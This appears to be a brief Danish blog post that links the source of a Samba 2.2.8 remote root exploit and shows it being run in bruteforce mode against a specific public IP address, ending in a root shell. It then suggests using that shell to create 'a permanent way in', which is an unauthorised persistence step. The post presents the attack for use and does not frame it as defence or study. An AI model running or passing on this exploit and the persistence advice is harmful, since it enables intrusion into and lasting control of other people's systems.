Linux penetration #1: Samba

http://base.fujang.dk/files/mike/sambal.c
Taken from :http://www.greyhat.org/exploits/2003/april/sambal.c

peanut# ./sambal -b 0 -v 80.196.128.94
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
————————————————————–
+ Verbose mode.
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Using ret: [0xbffffed4]
+ Using ret: [0xbffffda8]
+ Recieved a non session message
+ Using ret: [0xbffffc7c]
+ Using ret: [0xbffffb50]
+ Recieved a non session message
+ Recieved a non session message
+ Worked!
————————————————————–
*** JE MOET JE MUIL HOUWE
Linux ricecrispy 2.4.20 #2 Mon Mar 17 22:02:15 PST 2003 i686 unknown
uid=0(root) gid=0(root) groups=99(nogroup),98(nobody)

Now you have a ghost shell, you can type commands and send keystrokes til the command but it wont act like a regulare terminal, but enough for creating a permanent way in.

Dette indlæg blev udgivet i Exploits, Knowledge Base, Old Base. Bogmærk permalinket.

Skriv et svar